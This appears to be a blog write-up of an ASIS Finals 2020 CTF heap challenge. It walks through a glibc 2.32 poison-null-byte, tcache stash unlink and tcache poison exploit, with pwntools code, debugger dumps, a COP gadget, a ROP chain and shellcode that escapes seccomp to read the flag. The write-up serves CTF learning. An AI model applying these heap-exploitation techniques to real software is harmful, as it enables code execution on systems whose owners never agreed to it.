Search This Blog

Wednesday, December 30, 2020

Yet Another House ASIS Finals 2020 CTF Writeup

A few weeks ago, I played with DiceGang in Asis Finals CTF. Yet Another House was one of the heap pwnables, and it only had only one solve (which was by us). The general gist of it involved doing a glibc 2.32 poison null byte attack without a heap leak, a tcache stash unlink attack to overwrite mp_.tcache_bins, and a tcache poison for controlled arb write to escape seccomp for the flag. I didn't plan on making a writeup for this originally, but when redoing this complex pwnable a few weeks later, I thought it would be good for me to make some detailed notes so I don't forget about these techniques.

Before I start, I would like to thank the teammates who worked with me on this: Poortho (who did the majority of the work and blooded it), NotDeGhost, Asphyxia, and noopnoop.

Initial Work:

One thing to note immediately is the patch the author introduced into the glibc library. 

He effectively disabled the possibility of attacking global_max_fast. 

Now, reversing this binary (all protections are enabled):

Inside initialize, a 0x20 chunk is allocated and the address of the tcache_perthread_struct is recorded. According to seccomp-tools, only open, read, write, mprotect, clock_nanosleep, rt_sigreturn, brk, exit, and exit_group were allowed. Also note that this program doesn't return, only uses read() and write(), and exits with _exit, which means our seccomp escape probably will not use FSOP. 

From the allocation function, we know that our requested sizes must be greater than 0x100 and less than or equal to 0x2000. We also have 0 to 18 slots inclusive (so 19 total). The read_data function (which I didn't show) null terminates. I would say that this function overall is safe. The malloc_wrapper function performs another important task:

Seems like it wipes the tcache_perthread_struct everytime you call malloc :(

The delete function is safe and nulls out the size and chunk array indices respectively.

The leak function itself is also safe. I didn't show the code for write_1 here, but it only writes the number of bytes based on strlen(data), so if we want to use this for leaks, we have to be very careful to not introduce null bytes before the leak.

And here, we have a classic CTF heap note bug... the infamous null byte poisoning, as it adds a null byte one after the amount read in. Note that this function can only be used once, unless you reset the sanity value, but it wasn't necessary in this exploit.

The last thing to take note of is the libc leak for unsorted bin fd and bk pointers end with a null byte in this libc, which will prove slightly troublesome later on.


From the reversing above, we can conclude several things and propose a basic exploit path.

Fastbins can just be ignored due to the allocation size ranges and the fact that we can't change global_max_fast due to the custom patch. 

Tcachebins (or at least the original ones that are placed within the 0x280 tcache_perthread_struct) can be used, as long as you do not allocate - this is a key concept! You can also use malloc() to wipe the struct as a way to help you during your heap massage (Ex. if you want to leave a permanent chunk in between two chunks that would otherwise coalesce).

By glibc 2.32, there are many more mitigations. As documented in my Player2 writeup, glibc introduced a mitigation against poison null byte where it checks the size header compared to the prev_size header and ensures that they are the same before back coalescing. However, this time, we cannot just forge some headers easily like in Player2 via a heapleak to beat the unlink check. We will have to use the fact that glibc doesn't zero out the pointers for heap operations involving the unsorted and large bin (as each unique sized chunk in largebin has 2 sets of pointers, with the bottom two being fd_nextsize and bk_nextsize to help it maintain the sorted order). This technique has been documented in the following links (though some of them rely on the aid of fastbin pointers which we do not have): BalsnCTF Plainnote writeup, poison null byte techniques2.29 off by null bypass (like many pwnable writeups, Chinese CTF players often document some of the coolest and most obscure techniques, but Google Translate should suffice).

An interesting thing to note is that in 2.32, the tcache_perthread_struct no longer uses uint_8 to store tcache counts; it now uses uint_16. Hence, if we can place chunks in around the 0x1420ish range into the tcache_perthread_struct, the memset will not be able to wipe the tcache count (and the pointer as well). Some of you may recall that the tcache count did not matter before as long as you had a pointer in the tcache_perthread_struct (as I believe those checks were once asserts in tcache_get that got compiled out for release builds), but now, there are sanity checks against such behavior; this is why we need to allocate potential chunks for the tcache bin that has its count placed outside the memset range.

In order to expand the size of chunks we can place into the tcache, we can attack the malloc_par struct, with the symbol mp_ in libc. Take careful note of the tcache_bins member.

struct malloc_par
/* Tunable parameters */
unsigned long trim_threshold;
INTERNAL_SIZE_T mmap_threshold;
INTERNAL_SIZE_T arena_test;
INTERNAL_SIZE_T arena_max;
/* Memory map support */
int n_mmaps;
int n_mmaps_max;
int max_n_mmaps;
/* the mmap_threshold is dynamic, until the user sets
it manually, at which point we need to disable any
dynamic behavior. */
int no_dyn_threshold;
/* Statistics */
INTERNAL_SIZE_T mmapped_mem;
INTERNAL_SIZE_T max_mmapped_mem;
/* First address handed out by MORECORE/sbrk. */
char *sbrk_base;
/* Maximum number of buckets to use. */
size_t tcache_bins;
size_t tcache_max_bytes;
/* Maximum number of chunks in each bucket. */
size_t tcache_count;
/* Maximum number of chunks to remove from the unsorted list, which
aren't used to prefill the cache. */
size_t tcache_unsorted_limit;

By overwriting that with a large value (such as a libc address), we can place larger chunks into tcache and to bypass the wipe.

Normally, this type of write makes me think of an unsorted or largebin attack. However, since 2.28, unsorted bin attack has been patched with a bck->fd != victim check, and in 2.30, largebin attack has been hardened against, but how2heap still shows a potential way to perform this attack (I took a closer look at the newer version of this attack after the CTF; though I did not end up testing whether this would actually work in this challenge, it could potentially have offered a much easier alternative with the simpler setup). Another way to achieve this write in glibc 2.32 is to perform what is known as the tcache stashing unlink attack, which I learned from the following links: Heap Exploit v2.31, Tcache Stashing Unlink Attack.

The relevant source for this attack is here:

/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
if (tc_victim != 0)
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;
tcache_put (tc_victim, tc_idx);

Basically, when we have chunks inside a specific smallbin, causing malloc to pull from this smallbin will trigger a transfer of chunks into the respective tcache bin afterwards. Notice the point about bck = tc_victim->bk and bck->fd = bin during the stashing process. By corrupting the bk pointer of a smallbin, we can write a libc address into a selected address + 0x10. We must take note to do this only when tcache is one spot away from being filled so the stashing procedure can end immediately afterwards, avoiding any potential corruption. Most writeups would first start out with 6 tcache bins filled and then 2 smallbins, so you can pull out one smallbin and corrupt the bk of the last one (as smallbins are FIFO structures with chunks removed from the tail), trigger the stash process, and have it end immediately as tcache would become full. However, in this case, our tcache_perthread_struct always gets wiped, so we actually need 8 chunks in the smallbin; 1 to pull out, 6 to stash, and the final one to stash and write. Regardless of what happens, this respective smallbin will be corrupted and cannot be used again. If curious, readers can check out the stash unlink+ and stash unlink++ versions of this attack to get an arbitrary address allocation or an arbitrary address allocation and a write of a libc address somewhere in memory.

One more new protective feature in libc 2.32 is pointer obfuscation/safe linking, which I discussed previously in my CUCTF Dr. Xorisaurus writeup, where (stored pointer) = (address of fd pointer >> 12) ^ (fd pointer) for singly linked lists. Once we achieve a heap leak, this protection mechanism is trivial to beat, and the new aligned address check for these lists won't matter as we will be targeting __free_hook.

Lastly, since this writeup requires a lot of heap massaging involving smallbin and largebin, I recommend reviewing this page from the Heap Book for all the conditions. It didn't turn out to bad when writing this exploit as a lot of it just relied on some intuition and checking in a debugger.

Exploit Development:

I recommend closely following around with a debugger, as sometimes my explanations might be wrong or I might have misexplained a small step due to the complexity of this exploit.

To start off, I wrote some helper functions:

def wait():
def alloc(size, data, line=True):
assert(size > 0x100 and size <= 0x2000)
if len(data) == size:
line = False
if line:
def free(idx):
def leak(idx):
def edit(idx, data, line=True):
if line:
view raw hosted with ❤ by GitHub

Our first goal is to create a massive back coalesce with the poison null byte so we can perform overlaps. This part took quite a while, but Asphyxia ended up figuring this out late at night with the following general technique using largebins, unsorted bins, and normal back coalescing.

Several chunks are allocated, and then three chunks of different sizes (but same largebin) are freed into the unsorted. A chunk larger than all three were requested, causing a new chunk to be pulled from wilderness and the 3 unsorted chunks to be sorted into the same largebin in order, with 2 sets of pointers filled for each due to them having unique sizes. Notice how the one of the middle size has its first set of pointers aligned at an address ending in a null byte; this is purposeful as we will later forge a fake size header over the first set of pointers here, and can perform partial overwrites on other chunks with dangling pointers with just a single null byte from the alloc function to align and pass the unlink check. 

alloc(0x438, 'A' * 0x438) # 0
alloc(0x448, 'B' * 8) # 1, leave fd_nextsize part be null if target to backward consolidate onto is of large size
alloc(0x108, 'test') # 2
alloc(0x438, 'C' * 0x438) # 3, smaller than B
alloc(0x108, 'test') # 4
alloc(0x418, 'D' * 0x418) # 5
alloc(0x458, 'E' * 0x458) # 6, bigger than B
alloc(0x108, 'test') # 7
alloc(0x500, 'test') # 1, trigger largebin allocation, because of different sizes, we'll have 2 sets of pointer in each chunk in largebin
view raw hosted with ❤ by GitHub

all: 0x0
0x440: 0x55e0675e35c0 —▸ 0x55e0675e26f0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0
view raw hosted with ❤ by GitHub

Note that I didn't fill the middle chunk with as many characters since I will forge a fake chunk header there soon as it will be the target to back coalesce onto; as the back coalesce region will be quite large, I have to leave the part after the pointers as null bytes (or at least the 1 qword afterwards) as glibc unlink performs additional operations when the previous chunk is of large size and has non null fd_nextsize pointers.

Next, Asphyxia freed the chunk before the chunk in the middle largebin, causing it to back coalesce (while also leaving the 2 sets of pointers behind for me to use) and go into unsorted. Another allocation is made so that the first set of pointers left behind can be used to fake a chunk header, and the next set of pointers can be used as part of the way to beat the unlink checks (I chose a fake size chunk of 0x2150).

free(0) # backwards consolidate to help us start forging size, this goes to unsorted now from largebin, also have largebin pointers now from the chunk it coalesced from
alloc(0x438 + 0x30, 'A' * 0x448 + p64(0x2151)[:-1]) # 0, to help forge chunk header
view raw hosted with ❤ by GitHub

all: 0x55e0675e2720 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2720
0x440: 0x55e0675e35c0 —▸ 0x55e0675e2c50 —▸ 0x7f23ee201000 (main_arena+1120) ◂— 0x55e0675e35c0
pwndbg> x/20gx 0x55e0675e2720-0x50
0x55e0675e26d0: 0x4141414141414141 0x4141414141414141
0x55e0675e26e0: 0x4141414141414141 0x4141414141414141
0x55e0675e26f0: 0x4141414141414141 0x4141414141414141
0x55e0675e2700: 0x4141414141414141 0x0000000000002151
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0
0x55e0675e2720: 0x0000000000000000 0x0000000000000421
0x55e0675e2730: 0x00007f23ee200c00 0x00007f23ee200c00
0x55e0675e2740: 0x0000000000000000 0x0000000000000000
0x55e0675e2750: 0x0000000000000000 0x0000000000000000
0x55e0675e2760: 0x0000000000000000 0x0000000000000000
view raw hosted with ❤ by GitHub

Then, we cleared out the unsorted bin, and recovered the other two largebins, to then build an unsorted chain. Order of freeing now matters here for unsorted bins. We want to have the chunk underneath the fake headers to be in the middle, so its address in the unsorted chain can be used and changed to the fake chunk with just a null overwrite (as they are all in the 0x......7XX range). 

alloc(0x448-0x30, 'B' * (0x448-0x30)) # 3, clear our unsorted bin, also very important because this will be linked into the unsorted chain to help us with the dangling pointer partial overwrite
# 0, 1, 2, 3, 4, 5, 7
# now recover large bins and bring stuff back into unsorted
alloc(0x438, 'C' * 0x438) # 6
alloc(0x458, 'E' * 0x458) # 8
# 0, 1, 2, 3, 4, 5, 6, 7, 8
free(6) # unsorted chain
view raw hosted with ❤ by GitHub

all: 0x55e0675e35c0 —▸ 0x55e0675e2720 —▸ 0x55e0675e2c50 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e35c0
pwndbg> x/4gx 0x55e0675e35c0
0x55e0675e35c0: 0x0044444444444444 0x0000000000000461
0x55e0675e35d0: 0x000055e0675e2720 0x00007f23ee200c00
pwndbg> x/4gx 0x55e0675e2720
0x55e0675e2720: 0x0000000000000000 0x0000000000000421
0x55e0675e2730: 0x000055e0675e2c50 0x000055e0675e35c0
pwndbg> x/4gx 0x55e0675e2c50
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441
0x55e0675e2c60: 0x00007f23ee200c00 0x000055e0675e2720
view raw hosted with ❤ by GitHub

Now we want to recover the the 0x440 chunk in unsorted, write a single null byte there to satisfy the fd->bk == P check. We want to do the same thing on the 0x460 chunk; in order to preserve its pointers, we will back coalesce it with a chunk before it so the pointers are preserved. Then, an allocation can be made to place a null byte to change the 0x720 ending into a 0x700 ending, and the unlink check will be satisfied. Later on, when I trigger the malicious back coalesce, I will also manage to get some heap pointers in these two chunks for a heap leak due to how unlink works. Notice how the forged chunk has the perfect pointer chain setup to pass the unlink check.

free(5) # coalesce in unsorted to get leftover pointers
# 0, 1, 2, 4, 7
# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin
# 0, 1, 2, 3, 4, 5, 7"finished heap massage")
view raw hosted with ❤ by GitHub

pwndbg> x/4gx 0x55e0675e2700
0x55e0675e2700: 0x4141414141414141 0x0000000000002151
0x55e0675e2710: 0x000055e0675e2c50 0x000055e0675e35c0
pwndbg> x/4gx 0x000055e0675e2c50
0x55e0675e2c50: 0x0000000000000000 0x0000000000000441
0x55e0675e2c60: 0x4343434343434343 0x000055e0675e2700
pwndbg> x/4gx 0x000055e0675e35c0
0x55e0675e35c0: 0x4444444444444444 0x0000000000000461
0x55e0675e35d0: 0x000055e0675e2700 0x00007f23ee200c00
view raw hosted with ❤ by GitHub

Afterwards, I cleaned up the remaining largebin and unsorted bin, and performed a few more allocations just to expand the number of chunks I would have overlapped. I then allocated a few more chunks of 0x110 size (which I will use later for the tcache stash unlink attack), with some additional fake chunk metadata to allow me to free a fake 0x1510 chunk later, which I plan to use for the tcache poison attack. My final 0x110 chunk allocated is meant to just prevent consolidation later depending on the order of how I build my smallbin chain and I cannot use it as this extra spot is crucial for the later massage.

I triggered the poison null byte after setting the correct prev_size metadata and created a massive unsorted bin that overlapped a lot of memory after I freed the poisoned chunk.

# at this point we have an unsorted and largebin, let's clean up the unsorted and largebin
alloc(0x430, 'test') # 6
alloc(0x410, 'test') # 8
alloc(0x808, 'G' * 0x808) # 9
alloc(0x4f8, 'H' * 0x4f8) # 10
alloc(0x468, 'temp') # 11
# for stashing into tcache (since tcache won't get wiped unless we call malloc in this program)
alloc(0x108, 'stash') # 12
alloc(0x108, 'stash') # 13
alloc(0x108, 'stash') # 14
alloc(0x108, 'stash' + '\x00' * 3 + p64(0) + (p64(0) + p64(0x21)) * 13) # 15, for the later 0x1510 fake chunk that i will free to tcache poison
alloc(0x108, 'stash') # 16
alloc(0x108, 'stash') # 17
alloc(0x108, 'temp') # 18, so no back coalescing later when we send 17 to unsorted
edit(9, (p64(0) + p64(0x21)) * (0x800 / 16) + p64(0x2150), line=False)
# back coalesce
free(10)"achieved backwards coalesce")
view raw hosted with ❤ by GitHub

all: 0x55e0675e2700 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e2700
pwndbg> x/4gx 0x55e0675e2700
0x55e0675e2700: 0x4141414141414141 0x0000000000002651
0x55e0675e2710: 0x00007f23ee200c00 0x00007f23ee200c00
view raw hosted with ❤ by GitHub

Now chunk 3 will have heap pointers. Chunk 5 also does, but my forged size metadata comes before it so you won't be able to leak it from there.

Here, some serious heap massaging begins. During the CTF, Poortho managed to massage it cleanly in 2-3 hours (basically carrying us to the first blood); I remember his exploit having several dangling unsorted and small chains around so it is quite impressive that he managed to keep the heap stable. It took me much longer to massage the heap, and I had to keep it as clean as possible to avoid breaking it.

Since the libc address for unsorted bins started with a null byte, I had to find a way to get a largebin pointer allocated into the beginning of my chunk data for libc leak. I achieved this by first aligning the unsorted bin with one of my chunk data addresses, then allocated a very large chunk (greater than unsorted size) to trigger largebin activity, hence providing me with a libc leak. Two operations were also performed to fix some of the chunks' size metadata that got corrupted and overwritten during these heap manipulations (but they were unnecessary as I had to change all of them in the next stage of the exploit). I lastly allocated another 0x110 chunk into index 10, and used that as an opportunity to fix index 8's chunk size to something valid that will work with free() nicely.

# 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17
# everything from 0 - 9 is overlapped
heapbase = u64(p.recv(14)[8:].ljust(8, '\x00')) - 0x15c0'heap base: 0x%x' % heapbase)
# libc 2.32 has null ending for main arena + 96 libc address
alloc(0xa90, p64(0) * 3 + p64(0x421)) # 10, should align right over index 5, fix size of index 8
alloc(0x2000, 'test') # 18 send unsorted chunk into largebin, get largebin pointers into index 5
libcleak = u64(p.recv(6).ljust(8, '\x00'))
libc.address = libcleak - 0x1bf270'libc base: 0x%x' % libc.address)
free(10) # go back up
# fixing index 5 size
alloc(0x670, 'test') # 10
alloc(0x430, (p64(0) + p64(0x21)) * (0x410 / 16) + p64(0) + p64(0x441)) # 18
# recoalesce it up
alloc(0x108, p64(0) * 2 + (p64(0) + p64(0x21))*5) # 10, fix size of index 8
view raw hosted with ❤ by GitHub

A general technique I used above and one that I will use from now on to fake sizes or forge metadata is one where I allocate one to two massive chunks from the unsorted bin to reach the specified destination, write the data upon allocation, and then free it in the opposite order of allocation to back coalesce it and restore the state of the unsorted bin.

In order to perform a tcache stash attack in a scenario where the tcache_perthread_struct gets wiped on each malloc(), we need to have 15 0x110 chunks to be freed. The first 7 can be freed into tcache, and the next 8 will be freed into unsorted (in which we have to be very careful to avoid chunk coalescing). From there, we can trigger malloc to move all of them into smallbin, and have the chunk inserted into the 0x110 smallbin last be overlapped to have its bk pointer tampered with; this way we can still stash attack without crashing and have the final chunk entering tcache perform the write. At the current stage, we only have 0x110 chunks in 12, 13, 14, 15, 16, 17, 2, 4, 7, 10, and we will need 5 more. Here is the program chunk array as of now:

0x55e06625f520: 0x000055e0675e22c0 0x000055e0675e3b40 S
0x55e06625f530: 0x000055e0675e2b50 X 0x000055e0675e2c60
0x55e06625f540: 0x000055e0675e30a0 X 0x000055e0675e31b0
0x55e06625f550: 0x000055e0675e35f0 S 0x000055e0675e3a30 X
0x55e06625f560: 0x000055e0675e2730 0x000055e0675e4050 S
0x55e06625f570: 0x000055e0675e2710 X 0x000055e0675e4d60
0x55e06625f580: 0x000055e0675e51d0 X 0x000055e0675e52e0 X
0x55e06625f590: 0x000055e0675e53f0 X 0x000055e0675e5500 X
0x55e06625f5a0: 0x000055e0675e5610 X 0x000055e0675e5720 X
0x55e06625f5b0: 0x0000000000000000
view raw hosted with ❤ by GitHub

The ones marked with X are the 0x110 chunks (or at least should have that as the size and I have to repair them later). The ones marked with S are towards the end of the unsorted overlap, and hence I would like to save them for the overlap writes later. I plan on saving one for the tcache poison, one for the smallbin bk pointer corruption, and just one extra for backup/padding purposes (in the end, I didn't even need it); these were index 1, 6, and 9. 

To free up the other chunks, I performed the technique mentioned above (allocate one to two chunks, write the correct size or just spam with 0x21 sizes, and recoalesce back to restore unsorted chunk) on chunks 3 and 5 to make them isolated 0x20 sized chunks (size for index 8 has already been changed in the last 0x110 allocation), on chunk 9 to make it into size 0x1510, and applied it one last time to fix some of the 0x110 chunk size metadata that I may have overwritten. Chunk 11 can be freed before all of these operations by just having it back coalesce into the large unsorted bin. I will also free 0, which will add one more unsorted chunk into the unsorted bin, but luckily it didn't raise any new issues I had to deal with in the heap massage later. We should have 6 free spots at this point; 5 for additional 0x110 chunks and one for padding/alignment purposes to create an overlap.

# coalesce 11 into big unsorted
# fix index 3, remember to fix the 0x111 metadata issue (for 2, 4, 7), but we can repair this later
alloc(0x480, (p64(0) + p64(0x21)) * (0x430 / 16) + (p64(0) + p64(0x21)) * 5) # 11
# fix index 5
alloc(0x900, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * (0x80 / 2) + (p64(0) + p64(0x21)) * 10) # 11
# free index 8 now too, could have been done earlier
# fix index 9 to size metadata 0x1511 for potential tcache poison
alloc(0x17f0, '\x00') # 3
alloc(0x430, (p64(0) + p64(0x21)) * 2 + p64(0) + p64(0x1511)) # 5, around size 0x1420~0x1430ish to escape the memset on tcache_perthread_struct
# repair the 0x111 size for 2, 4, 7 (7 is still clean, so it's good) note how among 1, 6, 9, only 6 is before one of the 0x110 chunks? use 6 for the bk overwrite
alloc(0x820, (p64(0) + p64(0x21)) * (0x320 / 16) + p64(0) + p64(0x111)) # 3
alloc(0x450, (p64(0) + p64(0x21)) * 4 + p64(0) + p64(0x111)) # 5
free(3)'hopefully cleaned up heap')
# get another unsorted
view raw hosted with ❤ by GitHub

Now, I added 5 more 0x110 chunks. This cannot just be done as directly as such. Rather, I performed the allocations (and some frees) in such a way such that the unsorted bin created from freeing chunk 0 runs out after 3 0x110 chunk allocations. Then I allocated another 0x110 chunk, allocated a large chunk that extended into index 6 chunk's data (which we control), and allocated a 0x110 chunk from there (providing us with an overlap over a potential smallbin). Since we know that for this last chunk will go into unsorted before smallbin, I had to ensure that it will not coalesce with the neighboring unsorted, so I freed a previous 0x110 chunk and allocated one more from unsorted to act as a guard chunk; the nice thing about the tcache memset is that I can free smaller chunks like these to help with the heap massage without worrying about their return.

One thing to note is the reason for which I chose index 6 to be the one to overlap and overwrite the last smallbin bk. I mentioned it above in the code comments, but it's because there was a 0x110 chunk after it and it was also the first of the three chunks I kept in memory.

# empty are 0 3 5 8 11 18, until the newly added unsorted bin from freeing 0 runs out, the large chunk will be in largebin, but then will move back to unsorted since the new unsorted can't support all 5 allocations
alloc(0x108, 'stash') # 0
alloc(0x108, 'stash') # 3
alloc(0x138, 'stash') # 5 (otherwise metadata for 10 gets overwritten)
alloc(0x108, 'temp') # 5
alloc(0x108, 'stash') # 8
# now allocate a big one so next one can overlap with 6
alloc(0xd10, '\x00') # 11
alloc(0x108, 'stash') # 18
alloc(0x108, 'stash') # 5, free this one early on so it goes into tcache, and helps prevents 18 from consolidating with unsorted
view raw hosted with ❤ by GitHub

At this stage, we have 15 chunks of 0x110 size: index 0, 2, 3, 4, 5, 7, 8, 10, 12, 13, 14, 15, 16, 17, 18. To avoid any coalescing and keep these number of chunks for the tcache and smallbin frees, I closely considered the following rules I know (which you can see from debugging):

1. 12 to 17 is a chain (17 won't coalesce into top even if it is treated as unsorted due to a guard chunk placed below early on)

2. 12 will back coalesce into the large unsorted if not entered into tcache.

3. 0, 3 is a chain

4. 8, 10 is a chain

5. 5 is on top of the big unsorted chunk

6. 2, 4 are isolated

7. 7 has the potential to go into unsorted and merge with a smallbin

8. 18 must be the last one into the smallbin

Following these observations, I performed the following free chain: 14, 16, 3, 10, 5, 12, 7 (tcache filled, now into unsorted), 17, 2, 13, 15, 0, 8, 4, 18. I then made a larger allocation to trigger the transfer to smallbin of the 8 unsorted 0x110 chunks and freed this larger chunk to restore the large unsorted bin's state.

# only 1, 6, 9, 11 still left
alloc(0x450, '\x00') # 0, trigger movement from unsorted chain to smallbin for the 0x110 chunks
view raw hosted with ❤ by GitHub

Note that pwndbg labels the doubly linked bins as corrupted whenever I go over 4-5 chunks in them, but in reality, they are fine.

0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x55e0675e3860 —▸ 0x7f23ee200c00 (main_arena+96) ◂— 0x55e0675e3860
0x110 [corrupted]
FD: 0x55e0675e3640 —▸ 0x55e0675e3090 —▸ 0x55e0675e2810 —▸ 0x55e0675e22b0 —▸ 0x55e0675e54f0 ◂— ...
BK: 0x55e0675e5710 —▸ 0x55e0675e2b40 —▸ 0x55e0675e52d0 —▸ 0x55e0675e54f0 —▸ 0x55e0675e22b0 ◂— ...
view raw hosted with ❤ by GitHub

Since we don't have edit anymore, I had to free index 6 into unsorted, and then allocate for it to get it back and perform the overwrite over the index 18 0x110 small chunk to write a libc address into mp_.tcache_bins. Making another request into the smallbin should trigger the stash. 0x110 smallbin is also corrupted afterwards and you should avoid allocating from it.

payload = (p64(0) + p64(0x21)) * 5 + p64(0) + p64(0x110) + p64(heapbase + 0x1090) + p64(libc.symbols['mp_'] + 80 - 0x10) # overwrite .tcache_bins
alloc(0x430, payload) # 0, overlap smallbin 0x110 head's chunk
alloc(0x108, '\x00') # 2, trigger smallbin stash unlink'tcache stash unlinked, overwrote mp_.tcache_bin')
# can't touch 0x110 smallbin ever again
view raw hosted with ❤ by GitHub

0x110 [ 7]: 0x55e0675e3650 ◂— 0x55e539584543
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x0
0x110 [corrupted]
FD: 0x55e0675e3640 ◂— 0x55e539584543
BK: 0x7f23ee2002c0 (mp_+64) ◂— 0x408
0x1800: 0x55e0675e3860 —▸ 0x7f23ee201260 (main_arena+1728) ◂— 0x55e0675e3860
pwndbg> p mp_
$1 = {
trim_threshold = 131072,
top_pad = 131072,
mmap_threshold = 131072,
arena_test = 8,
arena_max = 0,
n_mmaps = 0,
n_mmaps_max = 65536,
max_n_mmaps = 0,
no_dyn_threshold = 0,
mmapped_mem = 0,
max_mmapped_mem = 0,
sbrk_base = 0x55e0675e2000 "",
tcache_bins = 139792295660800,
tcache_max_bytes = 1032,
tcache_count = 7,
tcache_unsorted_limit = 0
view raw hosted with ❤ by GitHub

Between index 1 and 9, I chose to use 9 for my tcache poison. To set this up, I first allocated a large enough chunk to make the unsorted bin small enough so that when I ask for a 0x1510 allocation, it pulls from wilderness. I then freed this new chunk, and then index 9 (which had its size overwritten with 0x1510). Due to the new mp_.tcache_bins value, a tcache chain is created here that is not reached by the 0x280 byte memset hooked onto malloc.

Then, I pulled from a chunk from the large unsorted chunk we had to overlap into what was index 9, and following the pointer obfuscation rules, changed it to __free_hook.

# 0, 1, 2, 9, 11, use 9 as the target for tcache poison, 1 was leftover but doesn't matter really (was a mistake on my part, but good that i still saved as a backup)
alloc(0x780, '\x00') # 3
alloc(0x1500, p64(0) * 4 + 'fizzbuzz') # 4
free(9) # created tcache chain
malicious_addr = ((heapbase + 0x2050) >> 12) ^ libc.symbols['__free_hook']
alloc(0x400, p64(0) * 9 + p64(0x1511) + p64(malicious_addr)[:-1]) # 4, tcache poison
view raw hosted with ❤ by GitHub

Now, we must decide on how to escape the seccomp filter. Of course we will need to do an open read write rop chain, however how can we pivot with only control over __free_hook (which implies we have control over rdi)? 

One idea that we had was setcontext, which is a well known function to use as a stack pivot.

Dump of assembler code for function setcontext:
0x00007f23ee08e520 <+0>: endbr64
0x00007f23ee08e524 <+4>: push rdi
0x00007f23ee08e525 <+5>: lea rsi,[rdi+0x128]
0x00007f23ee08e52c <+12>: xor edx,edx
0x00007f23ee08e52e <+14>: mov edi,0x2
0x00007f23ee08e533 <+19>: mov r10d,0x8
0x00007f23ee08e539 <+25>: mov eax,0xe
0x00007f23ee08e53e <+30>: syscall
0x00007f23ee08e540 <+32>: pop rdx
0x00007f23ee08e541 <+33>: cmp rax,0xfffffffffffff001
0x00007f23ee08e547 <+39>: jae 0x7f23ee08e66f <setcontext+335>
0x00007f23ee08e54d <+45>: mov rcx,QWORD PTR [rdx+0xe0]
0x00007f23ee08e554 <+52>: fldenv [rcx]
0x00007f23ee08e556 <+54>: ldmxcsr DWORD PTR [rdx+0x1c0]
0x00007f23ee08e55d <+61>: mov rsp,QWORD PTR [rdx+0xa0]
0x00007f23ee08e564 <+68>: mov rbx,QWORD PTR [rdx+0x80]
0x00007f23ee08e56b <+75>: mov rbp,QWORD PTR [rdx+0x78]
0x00007f23ee08e56f <+79>: mov r12,QWORD PTR [rdx+0x48]
0x00007f23ee08e573 <+83>: mov r13,QWORD PTR [rdx+0x50]
0x00007f23ee08e577 <+87>: mov r14,QWORD PTR [rdx+0x58]
0x00007f23ee08e57b <+91>: mov r15,QWORD PTR [rdx+0x60]
view raw hosted with ❤ by GitHub

However, starting around libc-2.29 (?) it relied on rdx instead of rdi, and we do not have control over rdx. After some attempts at FSOP and forcing in a format string attack, Poortho and I discovered an extremely powerful COP gadget (which exists in many (newer?) glibc versions) that allows us to control rdx from rdi and call an address relative to rdx. In this libc, it was the following:

mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];

This makes it relatively trivial as we can just set up the heap for the ROP (take care of the one push rcx instruction setcontext undergoes). I went for a mprotect to change heap to rwx, and then pivoted it to shellcode on the heap to open read write exit. Due to my previous spamming of 0x21 metadata, I was not able to allocate again from some of the larger chunks, but I had enough left in the unsorted bin to pull smaller chunks out. Here is the final bit of my exploit:

super_gadget = libc.address + 0x00000000001296b0 #: mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20];
poprsi = libc.address + 0x00000000000ba607#: pop rsi; ret;
poprdx = libc.address + 0x0000000000089972#: pop rdx; ret;
poprdi = libc.address + 0x0000000000027b26 #: pop rdi; ret;
alloc(0x1500, '\x00') # 5
alloc(0x1500, p64(super_gadget)) # 6'tcache poisoned onto __free_hook, overwriting with super gadget at 0x%x' % super_gadget)
shellcode = '''
mov rax, 2
mov rdi, %s
xor rsi, rsi
xor rdx, rdx
mov rsi, rdi
sub rsi, 0x100
xchg rdi, rax
xor rax, rax
mov dl, 100
xor rax, rax
mov al, 1
mov rdi, 1
mov al, 60
xor rdi, rdi
'''% int(heapbase + 0x2920)
shellcode = asm(shellcode)
# need it to call setcontext + 61 and then stack pivot onto our heap, poprdi written afterwards due to push rcx, and rcx derives its value from [rdx + 0xa8]
payload = (p64(0) + p64(heapbase + 0x2410) + p64(0) * 2 + p64(libc.symbols['setcontext'] + 61) + p64(poprdi) + p64(heapbase) + p64(poprsi) + p64(0x5000) + p64(poprdx) + p64(7) + p64(libc.symbols['mprotect']) + p64(heapbase + 0x2920 + 0x10)).ljust(0xa0, '\x00') + p64(heapbase + 0x2410 + 0x30) + p64(poprdi)
alloc(0x500, payload) # 7, have to avoid other larger chunks cause they might be seen as tcache and get pointers inside since i spammed heap
alloc(0x500, 'flag.txt'.ljust(0x10, '\x00') + shellcode)
print p.recvall()
view raw hosted with ❤ by GitHub

Final Exploit:

